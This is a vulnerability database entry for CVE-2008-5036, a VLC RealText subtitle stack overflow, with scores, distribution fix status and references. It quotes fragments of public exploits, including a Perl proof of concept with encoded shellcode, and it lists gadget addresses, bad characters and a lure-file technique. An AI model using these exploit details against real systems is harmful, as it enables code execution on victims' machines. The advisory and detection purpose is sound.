CVE-2008-5036
Published 2008-11-10

Priority: P3 · 53 · critical · CVSS 2.0 base score 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public exploit code available (see the Exploit-DB and Metasploit entries below)
EPSS: 41.44% (98.5th percentile)
Stack-based buffer overflow in VideoLAN VLC media player 0.9.x before 0.9.6 might allow user-assisted attackers to execute arbitrary code via an invalid RealText (rt) subtitle file, related to the ParseRealText function in modules/demux/subtitle.c. NOTE: this issue was SPLIT from CVE-2008-5032 on 20081110.
Affected
41 ranges · showing 25

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | vlc | < vlc 1.0.3-1 (bookworm) | vlc 1.0.3-1 (bookworm) |
| debian | vlc | < vlc 0.8.6.h-5 (bookworm) | vlc 0.8.6.h-5 (bookworm) |
| videolan | vlc_media_player | — (23 entries listed, no version data given) | — |
Detection & IOCs (extracted from sources)

Bytes: \x81\xc4\x54\xf2\xff\xff (add esp, -3500 stack adjustment prepended to payload)

- The exploit generates two files: a benign-looking .mp4 lure and a malicious .rt subtitle file; both must be present in the same directory for exploitation.
- Overflow is triggered inside ParseRealText in modules/demux/subtitle.c; monitor the VLC process for stack corruption when parsing .rt files.
- Bad characters for payload encoding are null byte, double-quote, and newline (\x00\x22\x0a); encoded shellcode in .rt files will avoid these bytes.
- Stack adjustment stub \x81\xc4\x54\xf2\xff\xff (add esp, -3500) prepended to shellcode; presence in a .rt file is a strong exploit indicator.
- Affected versions are VLC 0.9.x before 0.9.6; detection should flag VLC versions 0.9.0–0.9.5 parsing .rt subtitle files.
- The RealText return address 0x68f0cfad (jmp esp in libqt4_plugin.dll) is specific to VLC 0.9.4 on Windows XP SP3 and Windows 7 SP1; different builds require different gadget addresses.
- The standalone PoC uses 0x7c9d30d7 (jmp esp in shell32.dll), which is Windows XP SP3-specific; other OS versions require locating a different jmp esp gadget.
- CVE-2008-5036 was split from CVE-2008-5032; CVE-2008-5032 covers the CUE/VCD cdrom.c overflow, while CVE-2008-5036 covers only the RealText subtitle ParseRealText overflow.
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| osv | — | 9.3 | CRITICAL | — |
| vendor_debian | — | 9.3 | MEDIUM | — |
Debian
CVE-2008-5036: vlc (vendor_debian · 2008 · CVSS 9.3 · CRITICAL)
Stack-based buffer overflow in VideoLAN VLC media player 0.9.x before 0.9.6 might allow user-assisted attackers to execute arbitrary code via an invalid RealText (rt) subtitle file, related to the ParseRealText function in modules/demux/subtitle.c. NOTE: this issue was SPLIT from CVE-2008-5032 on 20081110.
Scope: local
bookworm: resolved (fixed in 1.0.3-1)
bullseye: resolved (fixed in 1.0.3-1)
forky: resolved (fixed in 1.0.3-1)
sid: resolved (fixed in 1.0.3-1)
trixie: resolved (fixed in 1.0.3-1)
Debian
CVE-2008-5032: vlc (vendor_debian · 2008 · CVSS 9.3 · CRITICAL)
Stack-based buffer overflow in VideoLAN VLC media player 0.5.0 through 0.9.5 might allow user-assisted attackers to execute arbitrary code via the header of an invalid CUE image file, related to modules/access/vcd/cdrom.c. NOTE: this identifier originally included an issue related to RealText, but that issue has been assigned a separate identifier, CVE-2008-5036.
Scope: local
bookworm: resolved (fixed in 0.8.6.h-5)
bullseye: resolved (fixed in 0.8.6.h-5)
forky: resolved (fixed in 0.8.6.h-5)
sid: resolved (fixed in 0.8.6.h-5)
trixie: resolved (fixed in 0.8.6.h-5)
GHSA
GHSA-qr75-p27m-crxr: CVE-2008-5036 (ghsa_unreviewed · 2022-05-14 · CVSS 9.3 · CRITICAL · CWE-119)
Stack-based buffer overflow in VideoLAN VLC media player 0.9.x before 0.9.6 might allow user-assisted attackers to execute arbitrary code via an invalid RealText (rt) subtitle file, related to the ParseRealText function in modules/demux/subtitle.c. NOTE: this issue was SPLIT from CVE-2008-5032 on 20081110.
GHSA
GHSA-jv67-453q-wxm3: CVE-2008-5032 (ghsa_unreviewed · 2022-05-14 · CVSS 9.3 · CRITICAL · CWE-119)
Stack-based buffer overflow in VideoLAN VLC media player 0.5.0 through 0.9.5 might allow user-assisted attackers to execute arbitrary code via the header of an invalid CUE image file, related to modules/access/vcd/cdrom.c. NOTE: this identifier originally included an issue related to RealText, but that issue has been assigned a separate identifier, CVE-2008-5036.
OSV
CVE-2008-5032 (osv · 2008-11-10 · CVSS 9.3 · CRITICAL)
Stack-based buffer overflow in VideoLAN VLC media player 0.5.0 through 0.9.5 might allow user-assisted attackers to execute arbitrary code via the header of an invalid CUE image file, related to modules/access/vcd/cdrom.c. NOTE: this identifier originally included an issue related to RealText, but that issue has been assigned a separate identifier, CVE-2008-5036.
OSV
CVE-2008-5036 (osv · 2008-11-10 · CVSS 9.3 · CRITICAL)
Stack-based buffer overflow in VideoLAN VLC media player 0.9.x before 0.9.6 might allow user-assisted attackers to execute arbitrary code via an invalid RealText (rt) subtitle file, related to the ParseRealText function in modules/demux/subtitle.c. NOTE: this issue was SPLIT from CVE-2008-5032 on 20081110.
No detection rules found.
Exploit-DB
VideoLAN VLC Media Player 0.9.5 - RealText Subtitle Overflow (Metasploit) (exploitdb · 2012-03-02 · CVE-2008-5036)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'VLC Media Player RealText Subtitle Overflow',
'Description' => %q{
This module exploits a stack buffer overflow vulnerability in
VideoLAN VLC MSF_LICENSE,
'Author' =>
[
'Tobias Klein', # Vulnerability Discovery
'SkD', # Exploit
'juan vazquez' # Metasploit Module
],
'Version' => '$Revision: $',
'References' =>
[
[ 'OSVDB', '49809' ],
[ 'CVE', '2008-5036' ],
[ 'BID', '32125' ],
[ 'URL', 'http://www.trapkit.de/advisories/TKADV2008-011.txt' ],
Exploit-DB
VideoLAN VLC Media Player < 0.9.6 - '.rt' Local Stack Buffer Overflow (exploitdb · 2008-11-07 · CVE-2008-5036)
#
# This should work on a fully up-to-date Windows XP SP3. If you want it to work
# on your OS version, just find a "jmp esp" address in one of the dlls loaded
# with VLC :).
# Have fun. Remember that VLC will open the file .rt automatically with a video
# of the same name (example: s.mov with s.rt in the same folder).
# Credits to Tobias Klein.
# Author has no responsibility over the damage you do with this!
use strict; use warnings;
# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x
Metasploit
VLC Media Player RealText Subtitle Overflow (metasploit)
This module exploits a stack buffer overflow vulnerability in VideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of RealText subtitle files. In order to exploit this, this module will generate two files: the .mp4 file is used to trick your victim into running it; the .rt file is the actual malicious file that triggers the vulnerability, which should be placed under the same directory as the .mp4 file.
No writeups or analysis indexed.
References
- http://git.videolan.org/?p=vlc.git%3Ba=commitdiff%3Bh=e3cef651125701a2e33a8d75b815b3e39681a447
- http://secunia.com/advisories/32569
- http://secunia.com/advisories/33315
- http://security.gentoo.org/glsa/glsa-200812-24.xml
- http://www.openwall.com/lists/oss-security/2008/11/05/4
- http://www.openwall.com/lists/oss-security/2008/11/05/5
- http://www.openwall.com/lists/oss-security/2008/11/10/13
- http://www.securityfocus.com/archive/1/498111/100/0/threaded
- http://www.securityfocus.com/bid/32125
- http://www.trapkit.de/advisories/TKADV2008-011.txt
- http://www.videolan.org/security/sa0810.html
- https://exchange.xforce.ibmcloud.com/vulnerabilities/46376
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14329
- https://www.exploit-db.com/exploits/7051

Published: 2008-11-10